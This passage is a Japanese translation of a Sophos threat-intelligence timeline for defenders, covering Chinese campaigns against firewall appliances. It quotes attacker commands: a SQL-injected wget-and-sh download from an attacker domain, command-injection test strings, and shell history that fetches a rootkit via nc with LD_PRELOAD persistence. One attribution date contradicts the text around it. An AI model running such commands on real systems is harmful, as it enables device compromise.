タイムラインで見る Pacific Rim：連携した複数の攻撃キャンペーンから得られた情報

Ross McKerchar and Andrew Brandt

2 months ago

** 本記事は、Pacific Rim timeline: Information for defenders from a braid of interlocking attack campaigns の翻訳です。最新の情報は英語記事をご覧ください。**

概要記事で説明したように、ソフォスは、ソフォスのファイアウォールを含むエッジデバイスを標的とする、複数の中国拠点の攻撃者と戦ってきました。本記事では、これらの攻撃者による注目すべき活動のタイムラインと、その活動に対するソフォスの対応、および攻撃の帰属と背景を述べたサードパーティの報告書について詳述します。

発見された活動の規模が大きいため、本記事は観測された全活動を記録した包括的な概要ではありません。また、すべての IOC を含むものでもありません。本記事は、確認された主要な TTP の詳細を防御側に提供することを意図しています。IOC の一部は機械可読形式で利用可能であり、こちらにリンクされています。Sophos X-Ops は、状況に応じて他の組織と協力し、さらに詳細な IOC を共有したいと考えています。pacific_rim[@]sophos.com までお気軽にお問い合わせください。

注: 本記事は MITRE ATT&CK® for Enterprise フレームワークのバージョン 15 を使用しています。攻撃者の活動を MITRE ATT&CK の戦術と手法にマッピングした表は、本記事の MITRE ATT&CK 戦術および手法のセクションに掲載されています。

Cyberoam への侵入
オペレーショナルリレーボックス (ORB) ネットワークの構築
- CVE-2020-12271 (Asnarök)
- CVE-2020-15069 (ブックマーク機能のバッファオーバーフロー)
前進的な防御
Cyberoam への標的切り替え
標的型攻撃
謝辞
付録 I — MITRE ATT&CK の戦術と手法
付録 II — 関連する業界のイベントと調査
付録 III — ネットワークデバイス CVE のデータベース
付録 IV— IOC

Cyberoam への侵入

最初の攻撃はネットワークデバイスに対するものではありませんでしたが、ソフォスの施設に対する攻撃として唯一報告されているもので、インドに拠点を置くソフォスの子会社 Cyberoam の本社に対するものでした。

2018 年 12 月: 攻撃経路の解明

ソフォスは、Cyberoam のオフィスの壁面に設置されたディスプレイを制御する低権限のコンピューターがネットワークスキャンを実行しているのを確認しました (MITRE ATT&CK 手法 T1046)。

このデバイスに対する最初のトリアージでは、常駐化や偵察に用いられる一般的な環境寄生型ツールやコモディティマルウェアが特定されたため、比較的未熟な攻撃者による攻撃だと考えられていました。しかし、デバイスで発見された SSH キーを軸に、X-Ops はより継続的な脅威を示す TTP を利用した攻撃経路の出発点を確認しました。以下がその一部です。

SSH および SSHD デーモンを、マルウェアファミリ「Onderon」に関連することが X-Ops のレポートで確認されたバージョンに置き換える (T1554)。このマルウェアファミリは、ESET が「The Dark Side of the ForSSHe」というレポート内で命名したものであり、bl0wsshd00r67p1 としても知られています。
リモートアクセス型トロイの木馬 (RAT) である Gh0st の Windows 版および Linux 版
AWS SSM に関連する過度に寛容な IAM 構成を悪用して、オンプレミスのデバイスからクラウド資産に移動する (2018 年時点では) 斬新な手法 (T1078.004)
特に重要な、以前には見られなかった大規模かつ複雑なルートキット (後にソフォスが詳細に分析し、Cloud Snooper と命名 (リンク先: 英語)) ( T1014)

この事例は、ソフォスの施設が直接標的となった唯一のインシデントでしたが、攻撃者が目的達成の必要性に応じて能力を向上させられることが実証されました。たとえば、この攻撃者は AWS SSM (2018 年の比較的新しいテクノロジー) に関して深い知識を有し、ATT&CK 手法 T1205.002. を使用してステルス性の高いコマンドアンドコントロール (C2) を備えたカーネルレベルのルートキットを展開しました。

オペレーショナルリレーボックス (ORB) ネットワークの構築

2020 年初頭から 2022 年終盤まで、攻撃者はインターネットに接続した Web ポータルを持つデバイスを標的とした複数のキャンペーン (T1190) に多大な労力とリソースを費やしました。

標的となった 2 つのサービスは、a) 主にリモートクライアントが VPN クライアントをダウンロードして設定するためのユーザーポータルと、b) 一般的なデバイス設定のための管理ポータルでした。これらのサービスはデフォルトでは LAN にしか面していませんが、攻撃者は、新型コロナウイルスの流行で在宅勤務が増加し、デバイスの所有者が両方のポータルにリモートアクセスするようになったことを利用していました。

攻撃を短時間で繰り返す中で、攻撃者はそれまで発見されていなかった一連の脆弱性を発見して悪用し、インターネットに接続されたサービスを標的として攻撃を実行しました。初期アクセスのエクスプロイトにより、攻撃者は低権限下でのコード実行が可能になり、追加のエクスプロイトや権限昇格手法 (T1059.004、T1203) を利用しつつ、デバイスに root 権限を持つマルウェアをインストールしました。

CVE-2020-12271 (Asnarök)

2020 年 4 月 21 日: 興味深いタイミングの一致

Asnarök 攻撃が発生するちょうど 1 日前、X-Ops は攻撃で標的とされたのと同じプラットフォームにおける SQL インジェクション (SQLi) の重大な脆弱性に関するバグ報奨金の報告を外部から受けました。報告された脆弱性は攻撃で使用された脆弱性とは異なるものであり、その研究者は以前からソフォスのプログラムなどに貢献していた (現在も貢献している) ため、攻撃と直接関連している可能性は高くありません。しかし、攻撃の 1 日前というタイミング、および研究者のデバイスの位置が疑わしいものだったため、当該の報告をご紹介します。研究者のデバイスは成都にありました。この報告後に追跡された活動の発信元として特定された中国の都市です。

2020 年 4 月 22 日: Asnarök 攻撃の検出

X-Ops は、管理者が閲覧可能な sfmipport データベースフィールドに不審な値があるとの報告を受けました。この目に見えるアーティファクトは、特定のバージョンのファームウェアを搭載したデバイスのサブセットでのみ表示されます。このバージョンでは、エクスプロイト後の自動化におけるバグがクリーンアップルーチンの失敗を引き起こしていました。

影響を受けたデバイスを調査したところ、ソフォスがその後 CVE 2020-12271 として指定する SQLi の脆弱性が特定されました。この脆弱性は、コマンドインジェクションによる権限昇格 (T1059) とともに使用され、攻撃者はデバイスへの root アクセスを取得して Asnarök トロイの木馬 (リンク先: 英語) をインストール (T1203) しました。トロイの木馬は、SQL を介してデータベーステーブルに以下のコマンドを注入することでインストールされました。

||cd /tmp/ && wget https://sophosfirewallupdate[.]com/sp/install.sh -O /tmp/x.sh && sh /tmp/x.sh||

Asnarök 攻撃では、デバイスへのホットフィックスを妨害する初期の試みも確認され、今回の攻撃ではホットフィックスを受け入れる管理者設定を継続的に false に設定するスクリプトループ (T1562.006) が使用されていました。

2020 年 4 月 23 日: ホットフィックスの検出と対応

ソフォスは、CVE 2020-12271 にパッチを適用し、特定されたマルウェアを終了させ、ファイアウォールから送信されるテレメトリの量と種類を増やすホットフィックスを自動的に配布しました。

このホットフィックスにより、X-Ops は悪意を持って改ざんされたデバイスをより明確に把握できるようになりました。また、CVE-2020-12271 の脆弱性を修正し、デバイスのメモリ上で実行されている既知の悪意あるプロセスを停止させました。

2020 年 4 月 24 日: ペイシェントゼロの特定

X-Ops のアナリストは、ホットフィックスから受信したテレメトリとトライアル版ライセンス登録データ、Web 解析を組み合わせることで、攻撃準備段階のタイムライン再現に成功しました。

最も注目すべきは、2020 年 2 月にさかのぼって不審な活動を行った 1 台のデバイスが特定されたことです。テレメトリ分析により、sfmipport データベースフィールド (Asnarök 攻撃で使用) へのコマンドインジェクション値の書き込みが試行されていたことが明らかになりました。このデバイスの IP は中国四川省の成都に位置していました。

トライアル版ライセンスデータにも注目することにより、複数の関連デバイスが特定されました。これらのデバイスからのテレメトリでは、脆弱性の調査やエクスプロイトの開発と共通するコマンドラインへのアクセスや使用が確認されました。中には、/tmp フォルダにファイルを書き込む機能をテストするためにインターフェースの sfmipport フィールドに書き込まれた以下の行も含まれていました。

||touch /tmp/exploit.txt|| :443;
echo xxx>/tmp/su1112;:443
:echo xxx>/tmp/su1112;:443

関連するアカウントは、デバイスのアーキテクチャに関する Knowledge Base の記事より特定されました。

X-Opsは、OSINT 分析とピボットを組み合わせることで、このデバイスは中国四川省にある Sichuan Silence Information Technology の Double Helix Research Institute が所有している可能性が高いと結論付けました。

2020 年 4 月 23 日～ 5 月 10 日: 前方展開ツール

X-Ops は、Asnarök 攻撃の事後分析を行う中で、悪意を持ってエクスプロイト研究を行うグループの管理下にあるとソフォスが確信するデバイスに展開するため、特殊なカーネルインプラントを構築しました。このツールは、目に見えるユーザーランドのアーティファクトを一切残すことなく、リモートファイルやログを収集できます。

2020 年 4 月 24 日～ 4 月 26 日: サーバーの差し押さえ

X-Ops は、Asnarök マルウェアが使用する主要な C2 チャネルである ragnarokfromasgard[.]com ドメインをホストするオランダ拠点のサーバーの押収を推進するため、オランダの国立サイバーセキュリティセンター (NCSC-NL) に支援を要請しました。NCSC-NL は、オランダ国家ハイテク犯罪ユニット (NHTCU) との仲介役を務めました。NHTCU はすぐにサーバーを差し押さえる令状を発行しました。

X-Ops チームはさらに、米国を拠点とするドメインレジストラに対し、同じ登録者によって登録され、同じサーバーでホストされている他のドメインとともに、このドメインの管理権をソフォスに移管するよう要請しました。

最初の接触から 2 日後に令状は承認されました。主要な C2 サーバーはオフラインにされ、NCSC-NL と NHTCU によってフォレンジック分析が行われました。

Sophos X-Ops は、この攻撃に関する調査結果を発表しました。ソフォス自身のハードウェアが標的となった攻撃の調査は初めてでした。ソフォスは当時の記事 (リンク先: 英語) で、この攻撃を「Asnarök」(攻撃で使用されたドメイン名「ragnarokfromasgard[.]com」より) と命名しました。

2020 年 4 月 28 日: アウトリーチ

ソフォスは、ホットフィックスが自動的に適用されなかった少数の登録ユーザー (サポートが終了したデバイスや管理者がホットフィックスの自動適用をオフにしているデバイス) へのアウトリーチを開始しました。

2020 年 5 月 3 日: EDR 機能

X-Ops はソフォスの製品エンジニアリングチームと協力し、ファイアウォールのテレメトリ収集プロセスに新たな EDR (Endpoint Detection and Response) 機能を追加し始めました。

2020 年 5 月 4 日: ドメインの差し押さえ

レジストラは、Asnarök マルウェアによって使用されたドメインと、同じユーザーによって登録された他のドメイン (いずれも正当な目的で使用されたことはない) の管理をソフォスに引き渡しました。X-Ops はドメインをソフォスが管理するシンクホールにリダイレクトしました。ドメインの差し押さえにより攻撃者の C2 チャネルが遮断され、感染したデバイスに関する追加データがシンクホールを通じてソフォスに提供されました。

2020 年 5 月 5 日: シンクホールの分析

シンクホールのリクエストログを分析した結果、さまざまなユーザーエージェントとリクエスト URI が多数確認されました。X-Ops は、パッチが適用されていない少数のソフォス製デバイスやサポート切れのソフォス製デバイスからの予想されるリクエストに加え、他ベンダーの消費者向けルーターや SOHO ルーターにマッピングされるユーザーエージェント文字列とペイロードリクエスト、さらに Ragnarok ランサムウェア (T1584.008) に関連する可能性のあるさまざまなリクエストを特定しました。

2020 年 5 月 20 日: 復旧

ソフォスエンジニアリングは、影響を受ける可能性のあるデバイスのパスワードを強制的にリセットするホットフィックスをリリースし、自動化された認証情報スタッフィング攻撃を阻止するためにログインキャプチャを実装しました。

2020 年 5 月 21 日: 詳細情報開示

Sophos X-Ops は、この攻撃に関する新たな詳細情報を明らかにするフォローアップブログ記事を投稿 (リンク先: 英語) しました。Asnarök の攻撃者は攻撃がまだ進行中であった 4 月、攻撃フローに 2 回の変更を加えました。

CVE-2020-15069 (ブックマーク機能のバッファオーバーフロー)

2020 年 4 月 9 日: 第 2 戦への準備

攻撃者が Asnarök 攻撃で CVE-2020-12271 を悪用する準備をしていたちょうどその時にも、別のエクスプロイトの開発が進行していました。X-Ops はこの日、過去にさかのぼって脅威を探索し、後に CVE-2020-15069 に指定される脆弱性が初めて使用されたことを確認しました。

その後、このデバイスや、同じソース IP を共有する他のデバイスを分析した結果、テスト試行に関連する特徴が特定されました。

頻繁な再起動サイクル
以前のファームウェアバージョンへのロールバック (ディスクスナップショットの復元を示します)
無料の Web メールプロバイダー (今回の事例では中国を拠点とするプロバイダーである 163.com) の利用を示す登録データ
ファームウェアのバージョンが異なっていたり、頻繁に変更されていたりする多数のデバイス (物理デバイスと仮想デバイスが混在していました)
LAN インターフェイス経由で接続されるごく少数のデバイス
他のデバイス (Huawei) からネットワークアドレスを変換した、プライベート IP アドレスを持つ WAN インターフェイス

物理デバイスのシリアル番号を追跡したところ、正規のパートナーによって購入され、中古品として再販されたものである可能性が高いことがわかりました。

2020 年 6 月 17 日: 第 2 戦の開始

Asnarök 攻撃の開始から 56 日後のこの日、攻撃者はカスタム Apache モジュールのゼロデイバッファオーバーフロー脆弱性 (CVE-2020-15069) の悪用を開始しました。ローカルの権限昇格と連鎖しているこのエクスプロイトは、WAN に面した Web ポータルを実行するデバイスを標的とした、悪意のある Web シェルの無差別展開 (T1505.003) に使用されました。

2020 年 6 月 18 日: 攻撃活動の素早い変化

攻撃および Web シェルの分析により、攻撃者の TTP に大きな変化があり、Asnarök 攻撃に対応して展開されたいくつかの防御策が回避されていることが明らかになりました。以下がその変化の一例です。

中央の C2 を使用しない
Asnarök に対しては、X-Ops が C2 ドメインを乗っ取ることで、マルウェアを効果的に無力化できました。新しい Web シェルは外部の C2 にコマンドを送信するのではなく、インバウンドコマンドをリスンしていました。
単純化
Asnarök マルウェアは大規模で、重要な機能が直接埋め込まれていたため、X-Ops はリバースエンジニアリングを行うことで攻撃者の意図を確認できました。小さな Web シェルを使用してコマンドを実行することで、攻撃者は活動の意図を隠し、X-Ops から見えないシステム上でペイロードを「サーバー側」に保持するようになりました。

ステルス性の向上
Web シェルの単純さゆえ、追加の実行プロセスや常駐化メカニズムを必要としないため、検出の機会が制限されます。さらに、外部からの発見を妨げるために、この Web シェルは正しいパスワードを提供しないリクエストに対しては HTTP 400を返すようになっていました。X-Ops は、Web シェルに直接保存されているパスワードのハッシュをクラックしようと試みましたが、失敗しました。

X-Ops は、Asnarök 攻撃の後にデバイスに追加された新しいテレメトリ収集機能を利用することで、最初の侵入経路と影響を受けたデバイスを迅速に特定しました。さらに、テレメトリにより、Asnarök 攻撃や今回の攻撃が行われる以前の 4 月 9 日にこのバージョンの Web シェルが配信された、攻撃者により乗っ取られた可能性の高いペイシェントゼロデバイスを 1 台特定しました。

2020 年 6 月 24 日: 発信元の難読化

事後分析により、6 月 17 日以降、感染したアプライアンスにコマンドを送信していた約 175 件の一意の IP アドレスが特定されました。すべての IP アドレスは匿名化されたネットワークの一部であり、攻撃の真の発信元を難読化 (T1090.003) していました。

2020 年 6 月 25 日: クリーンアップ

ソフォスの製品エンジニアリングチームは、CVE-2020-15069 のコード実行の脆弱性を修正し、デバイスにインストールされたマルウェアを削除するため、一連のホットフィックスをリリースしました。また、これらのホットフィックスは、標的がホットフィックスを受信できないよう攻撃者によって加えられた変更を元に戻すものでもあります。

2021 年 2 月 18 日: 情報の持ち出し

X-Ops は、12 週間の休止期間を経て、CVE-2020-15069 を使用したサポート終了デバイスやパッチ未適用デバイスに対する新たな活動を確認しました。ペイロードはアプライアンスに保存された認証情報を盗み出し、バックドアを追加していました。

この攻撃はさらに、以前の攻撃で使用されていたのとは異なるペイロードを配信しました。patch.sh と IC.sh という 2 件の Linux シェルスクリプト (T1059) です。

IC.sh スクリプトは、デバイスからローカルユーザーアカウントデータを盗み出し、香港を拠点とする ISP の IP アドレスに送信しました。また、このスクリプトにはエンコードされた patch.sh のコピーが含まれており、ファイルシステムに書き込まれました。このファイルは、ホットフィックスの自動アップデートを無効にするフラグをデータベースに設定し、5 分ごとにそのコマンドを再実行していました (T1562.001)。攻撃者が IC.sh を配置した場所は、(おそらく偶然ではなく) 2020 年 4 月の Asnarök 攻撃で悪意のあるスクリプトに使用されたのと同じファイルシステムのパスでした。攻撃者はさらに、2020 年 6 月のブックマークバッファオーバーフロー攻撃で初めて確認された動作である、ホットフィックスのメカニズム妨害を実行しました。

patch.sh スクリプトは 1 時間に 1 回実行され、デバイスが侵害されたことの証拠となり得る、データベースに残された痕跡の消去を試みました。

この攻撃は、攻撃者がテレメトリシステムに直接干渉していた点でも注目されました。Asnarök 攻撃後、4 月に実施されたテレメトリの改善への対策、あるいは自らの行動を隠すためだと考えられます。

前進的な防御

2020 年 6 月 30 日: テレメトリの価値実証

テレメトリを追加で収集し、脅威ハンティングを行った結果、不審なコマンドを実行するデバイスが発見されました。トリアージでは、masscan (ネットワークポートスキャナ) や単純な RAT など、いくつかの不審なコンポーネントが特定されました。その後の分析により、影響を受けたデバイスがさらに 21 台特定されました。すべての事例で、初期アクセスは脆弱な SSH 認証情報 (T1110.001) を経由していることが判明しました。X-Ops は、この攻撃は独立したものであり、より大規模で高度な攻撃とは無関係である可能性が高いと結論づけました。一方、この攻撃は追加のテレメトリと脅威ハンティングプロセスのための初期の概念実証の取得に役立ちました。

2020 年 7 月 9 日: 初のインプラント展開

X-Ops のアナリストは、テレメトリからデバイスを特定し、Double Helix Research Institute に所属するものであることを確信しました。法律顧問との相談を経て、X-Ops は標的型インプラントを配信し、攻撃者が vim を使用して簡単な Perl スクリプトを記述、実行しているのを確認しました。インプラントの配信自体の意義は小さかったものの、攻撃者が制御するデバイスをほぼリアルタイムで観察できたことは、情報収集能力の貴重なデモンストレーションとなりました。

2020 年 7 月 14 日: TStark との遭遇

X-Ops は、ブックマークバッファオーバーフローのエクスプロイトが実行された最初のデバイスを探索する中で、「TStark」と呼ばれる攻撃者 (「TStark」で始まる Proton Mail の電子メールアドレスを使用していました) と、その攻撃者が登録したデバイス群を特定しました。

TStark のデバイス群には、CVE-2020-15069 を標的としたブックマークバッファオーバーフロー攻撃 (T1203) に関連する最初期の悪意のあるペイロードのサンプルが含まれていました。各デバイスはさらに、VPN が断続的に使用されていることを示す奇妙なテレメトリの動作を示し、テレメトリのソースは、香港に位置する IP アドレスと、成都に位置するた IP アドレスを急速に切り替え続けていました (T1133)。

X-Ops は、後に TStark に属することが確認された物理デバイスの1つが、成都にある中国電子科学技術大学 (UESTC) の元研究者によって以前に登録されていたことを突き止めました。

2020 年 7 月 27 日: ペイオフ

X-Ops は、攻撃者デバイスを特定する手法を改善した後、Double Helix Research Institute に関連するデバイス群に標的型インプラントを展開しました。

この可視性の向上により、X-Ops はこれまで知られていなかったステルス性の高いリモートコード実行エクスプロイトを迅速に特定できました。これまでのエクスプロイトは、データベースの値を操作する権限昇格の手法と連鎖させる必要がありました (リスクが高く、ノイズの多い操作であるため、検出の一因となっていました) が、このエクスプロイトでは痕跡を最小限に抑え、root への直接アクセスが可能になっていました。以下は、開発中の新しいゼロデイエクスプロイトの発見に繋がったコマンドライン活動の抜粋です。

gdb -p 2951
ls
ls
ls -lsa
nopcode -d -n nosync -t json -b
nopcode deny_remote_adminip -d -n nosync -t json -b "[\"ipaddress\": \"; touch /tmp/zz77; \°, \"addr_family\":\"2\*), 192.168.31.187\*, \"timeout\": \"60\", \"addr_family\": \"0\")* nopcode deny_remote_adminip -d -s nosync -t json -b "(\"ipaddress\*: \*; touch /tmp/zz77; \*, \"addr_family\*:\*2\*), 192.168.31.187\*, \*timeout\*: \*60\*, \"addr_family\": \"0\")*
ls
rm zz77
ls

X-Ops は、インプラントの機能を活用してエクスプロイトに関するデータを取得し、ブルートフォース検出コンポーネントのX-Forwarded-For http ヘッダーを介したコマンドインジェクションの脆弱性を特定しました。その後、エクスプロイトを再現し、エンジニアリングチームと協力してパッチを適用しました。

2020 年 7 月 28 日: 影響分析

脅威ハンティングの結果、それぞれ法律事務所および IT サービス会社で使用されている 2 台のデバイスが、このエクスプロイトを使用して攻撃されていることが判明しました。

X-Ops は、両方のデバイスが同じ IP アドレス (米国を拠点とするホスティング会社のもの) へのリバースシェル接続 (T1059) を開いていることを確認しました。

2020 年 7 月 30 日: 難読化されたホットフィックス

ソフォスは、3 日前に発見された 2 台の侵害されたデバイスを含む、すべての脆弱なデバイスにパッチを配信しました。X-Ops は事前の Web 解析により、攻撃者がホットフィックスやパッチに関連するソフォスの Knowledge Base 記事を監視していることを把握していたため、修正プログラムを難読化する必要がありました。ソフォスのエンジニアリングチームは、重要な新機能を隠すために、関連性の低い複数の問題を修正するパッチを装いました。

2020 年 8 月 9 日～ 8 月 13 日: さらなるインプラント

デバイスのテレメトリを定期的に監視したところ、最近登録された 2 台の不審なデバイスが発見されたため、追加で監視を行いました。

X-Ops は、/tmp 内のバイナリが 4438 と 4439 の外部 IP アドレスに到達するなど、監視対象デバイス上でさらに不審な活動を検出しました。

その後の解析により、深刻度の低い、OS コンポーネントにおける認証後のリモートコード実行の脆弱性 (T1210) が特定されました。X-Ops は、この脆弱性を修正するためのホットフィックス作業を開始しました。

2020 年 8 月 13 日～ 8 月 14 日: ルートキット #2: さらなるステルス化に失敗

ブックマークバッファーオーバーフロー攻撃の分析に取り組んだ際、X-Ops は「TStark」に登録されたデバイスから直接、新しいマルウェアのサンプルを入手しました。

libxselinux.so と名付けられたこのサンプルは、もともとは Winnti 攻撃者グループに所属するコードに基づいてカスタマイズされたユーザーランドのルートキット (T1014) でした。

このマルウェアには 2 つのコンポーネントがあります。C2 サーバーと通信するためのコアエンジンと、起動時にローカルシステム上のデバイスを一覧化し、コアモジュールを実行するユーザーランドのルートキットモジュール (T1547) です。

過去にさかのぼって調査した結果、1 台の TStark デバイス以外には libxselinux.so のコピーは見つかりませんでした。将来の使用を予防するため、ソフォスはこのルートキット (Linux/Winnti-T) を検出し、ブロックする保護をプロアクティブに配信しました。

2020 年 8 月 21 日: TStark の攻撃準備

X-Ops は TStark に属するデバイスから複数のファイルを取得しました。攻撃者から取得したファイルの中には、Mac OS X および iOS 上で動作するように設計されたマルウェアと、WebAssembly (wasm) の脆弱性を悪用する IFRAME インジェクションコード (T1189) が含まれていました。

2020 年 8 月 31 日～ 10 月 31 日: チベットの標的とルートキット #3

この間、ソフォスは Volexity と協力し、チベットからの亡命者をサポートする組織を支援しました。侵害を受けたデバイスの分析により、「TStark」攻撃によるツール (わずか 10 日前に特定されたもの) と、Volexity が「Evil Eye」と名付けたグループ (「複数の中国の APT グループ」に帰属) との IOC の重複が確認されました。

Volexity の研究者は、同じデバイスで見つかったルートキットのサンプルも共有しています。X-Ops のアナリストは、これらのファイルが GitHub リポジトリから入手可能な、Suterusu と呼ばれるロード可能カーネルモジュール (LKM) ルートキット (T1014) の一部であることを突き止めました。Suterusu のペイロードは、すべてのオプション機能が削除された状態でコンパイルされていたため、機能は README ファイルに記載された 18 種類のコマンドに限られていました。

Cyberoam への標的切り替え

2020 年 11 月 28 日: 手頃な攻撃対象

Cyberoam の製品ラインは、当時サポート終了を迎えようとしていたレガシー製品でしたが、インドの Cyberoam 旧オフィスへの攻撃から約 2 年後に攻撃を受けました。

攻撃者は後に CVE-2020-29574 として指定されるゼロデイ脆弱性を利用して、侵害されたデバイス上に「cybersupport」という新しい管理者レベルのユーザーアカウントを作成 (T1136.001) しました。

ソフォスは、この脆弱性の修正と、攻撃者が作成したアカウントの削除を実行するホットフィックスを配信しました。さらに、登録済みの所有者に対して、デバイスをアップグレードするか、完全にサービスを停止するかのいずれかを奨励するアウトリーチを実施しました。

2020 年 7 月 21 日: ANSSI による帰属先の特定

2020 年 11 月に発生した Cyberoam アプライアンスに対する SQL インジェクション攻撃から 8 か月後、フランス政府のサイバーセキュリティ機関 ANSSIは、Cyberoam のアカウント作成攻撃が中国を拠点とする脅威グループである APT-31 によるものであると公表しました。

ANSSI の発表によると、影響を受けた Cyberoam デバイスは、攻撃者によって Ivanti リモートアクセスゲートウェイなどの他のデバイスに対する攻撃を開始するためのリレーまたはプロキシとして使用されていました。今や APT の常套手段となっていますが、感染したデバイスをこのように使用することで、攻撃者は標的となった他のデバイスに対する攻撃の本当の発信元を隠していました。

標的型攻撃

2021 年以降、攻撃者は広範な無差別攻撃から、主にアジア太平洋地域の政府機関、重要インフラ、研究開発組織、ヘルスケアプロバイダー、小売、金融、軍事、公共部門といった特定の主体に対する高度に標的化された、狭い範囲への「手動」攻撃に焦点を移したようです。

CVE-2022-1040 (「Personal Panda」)

2022 年 3 月 21 日: 脆弱性の「二度漬け」？

この日、ソフォスは再度、非常に有用な一方で疑わしいバグ報奨金報告を受けました。ある匿名のセキュリティ研究者が、ソフォスのバグ報奨金プログラムにゼロデイ脆弱性を報告しました。この脆弱性は CVE-2022-1040 として指定されています。自身の名前がクレジットに表記されることを希望しないこの研究者は、日本に拠点を置いているが、使用するデバイスの IP は中国に位置していると主張しました。この研究者は 2 万ドルの報奨金を受け取りました。

その報告には、SFOS の認証バイパスのバグと、研究者が権限昇格を行ってルートシェルを取得するために使用した OpenSSL のコマンドインジェクションバグという 2 件の別々の脆弱性が含まれていました。

2022 年 3 月 23 日: 迅速な修正

ソフォスはこの脆弱性を修正するホットフィックスをリリースしました。

2022 年 3 月 24 日: 攻撃の被害者

X-Ops は過去に遡った調査を通じて、バグ報奨金プログラムへの報告以前から CVE-2022-1040 が実際に悪用されていたことを確認しています。被害の広がりは限定的であるものの、被害状況とその時期から、中国の外交政策に沿った標的パターンが明らかになりました。特に注目すべきは、以下の主体を標的としていた点です。

一帯一路関連の債務交渉を行う重要な時期の政府中枢機関
2020 年 8 月にも攻撃を受けたチベット関連の組織

2022 年 3 月 25 日: 情報開示

ソフォスは CVE-2022-1040 アドバイザリを公開しました。

2022 年 3 月 26 日～ 4 月 7 日: ルートキット #4

X-Ops は、継続的な脅威ハンティング、影響を受けた組織への働きかけ、影響を受けたデバイスの分析により、侵入後のツール使用および TTP の複雑な状況が手動での標的設定および配信と共通していることを特定しました。

ソフォスは 2022 年 7 月に調査結果の一部を公表しました (リンク先: 英語)。

X-Opsは、以前に公開されたものに加えて、CVE-2022-1040 に関連する、新規かつ特注のルートキットである libsophos.so (T1014) に関連する活動群を特定しました。NCSC-UK は後にこのマルウェアを分析し、「Pygmy Goat」と名づけました。

X-Ops は、CVE-2022-1040 を使用した libsophos.so のコピーが 2 件、1 件は政府中枢用デバイスに、もう 1 件は同じ政府省庁の技術パートナーに配信されているのを確認しました。

Gh0st RAT のコピーと一緒に配信された libsophos.so を分析したところ、ソフォス製品のファイル命名規則と動作を忠実に模倣した、カスタムビルドの完全な機能を備えたユーザーランドのルートキット (T1036) が見つかりました。

X-Ops の解析により、libsophos.so ライブラリは LD_PRELOAD 環境変数を使用することで、システムの SSH デーモン (SSHD) に自身を注入できることが判明しました。この機能により、ライブラリは他のシステムライブラリよりも先にロードされ、SSHD プロセスに挿入されることで、プロセスの動作を変更していました。特に、プロセスには細工された ICMP パケットをリスンして応答する機能が追加されていました。このパケットが感染したデバイスによって受信されると、攻撃者が選択した IP アドレスへの SOCKS プロキシまたはリバースシェルバックコネクションが開かれます (T1090、T1059)。この手順は、同じ手法を採用した 2018 年 12 月の Cloud Snooper 攻撃を彷彿とさせるものでした。

X-Ops は、libsophos.so の開発を遡及的に TStark グループに関連付けました。2022 年 2 月 18 日、TStark にリンクされた 2 台のデバイス (1 台は物理デバイス、1 台は仮想デバイス) のシェル履歴から、攻撃者がデバイス上で libsophos.so (別名 libgoat.so) の名前を変更して実行し、常駐化を試みていることが確認されました。

rm -f /lib/libsophos.so
nc 192.168.1.85 4444 > /lib/libsophos.so
mv /tmp/server_x32 /lib/libsophos.so
sed -e 's/exec \/bin\/dropbear/export LD_PRELOAD=libsophos.so
chmod +x /bin/killlibgoat
mv /tmp/goatserver_x64 /etc/libgoat.so
killall libgoat.so

攻撃者のデバイスで観察されたあるバージョンの libsophos.so には、被害者のデバイスで見られたのと同じハッシュ (c71cd27efcdb8c44ab8c29d51f033a22) が確認されました。

その中のあるデバイスには、デバッグや制御フローのトレースによく使われるツールである valgrind と prex のコピーも含まれていました。このデバイスの管理者アカウントの電子メールアドレスは、中国の攻撃型セキュリティ研究者で Linux シェルコードの専門家のものであることが公表されました。

2022 年 4 月 2 日: OpenSSL の報告

ソフォスは 4 月 2 日に OpenSSL のバグを報告しました。この脆弱性には CVE-2022-1292 という CVE 番号が付与されています。

2022 年 4 月 7 日: JAR に隠れる

継続的な分析により、既存の Java アーカイブ (JAR) ファイル内に埋め込まれたトロイの木馬化クラスファイルという、新たな常駐化 TTP が特定されました。トロイの木馬化されたクラスファイルは、インターネットからアクセス可能な Java サーブレットにロードされ、HTTP POST を介して提供される他の AES 暗号化クラスファイルのダイナミックローダー (T1574.004) として機能します。(Volexity はこの常駐化メカニズムについて、DriftingCloud レポートでさらに詳しく説明しています。)

2022 年 5 月: libsophos の再登場

脅威ハンティングの結果、libsophos.so ルートキット (T1014) を実行する 3 台目のデバイスが確認されました。このデバイスは、最初の標的とは異なるアジアの国の軍事病院のものでした。

2022 年 5 月 3 日: OpenSSL の修正

OpenSSL は CVE-2022-1292 の修正を発表しました。

2022 年 6 月 16 日: Sliver

Volexity との協力によって得られた追加の IOC (彼らは DriftingCloud として紹介しています) に続いて、X-Ops は C2 IP 192.248.152.58 との通信を検索する追加の脅威ハンティングを実行しました。

この脅威ハンティングでは、医療テクノロジープロバイダーが所有する 1 台のデバイスで、libiculxg.so というマルウェアサンプルが実行されていることが判明しました。X-Ops の分析により、libiculxg.so はデュアルユースの攻撃エミュレーションフレームワーク「Sliver」に属することが判明しました。

2022 年 10 月 19 日～ 29 日: カンファレンスでの情報開示

Sophos X-Ops は、CVE-2022-1040 攻撃とそのマルウェアのペイロードに関する研究 (「Your Own Personal Panda」) を公開し、その詳細を 3 つのカンファレンス(Virus Bulletin、BruCON、Saintcon) で発表しました。

Covert Channels (CVE-2022-3236)

2022 年 9 月 16 日: 劣悪なオペレーションセキュリティが攻撃者を利する

X-Ops は Microsoft のインシデント対応チームと協力し、アジアの大手金融サービス機関の侵害されたデバイスを特定しました。デバイスの分析により、後にソフォスが「Covert Channels (秘密のチャネル)」として公表することになる一連の活動の最初の事例が特定されました。

注目すべきは、X-Ops が (影響を受けたデバイスのごく一部で) 新たに 2 つの TTP を確認したことです。

- デバイスの Web インターフェイスで処理された認証情報を盗聴するために Personal Panda 攻撃で使用されたバックドア JAR 手法の進化版
- LAN 側ドメインコントローラーから DCSync 認証情報ダンプを実行するために、スニッフィングされた認証情報を使用 (T1003.006)

X-Ops は、バックドア化された JAR ファイルが存在する他のデバイスのテレメトリ調査を実施しました。その結果、Personal Panda 攻撃と被害状況が似ている小規模なデバイス群が特定されました。影響を受けたデバイスの初期分析では、ファイル名と権限の相違、さらに重要な点としてはログ消去ルーチンの一貫性の無さなど、手動での標的設定およびツールの配信と一致する挙動が示されました。

2022 年 9 月 17 日: 初期アクセスの特定

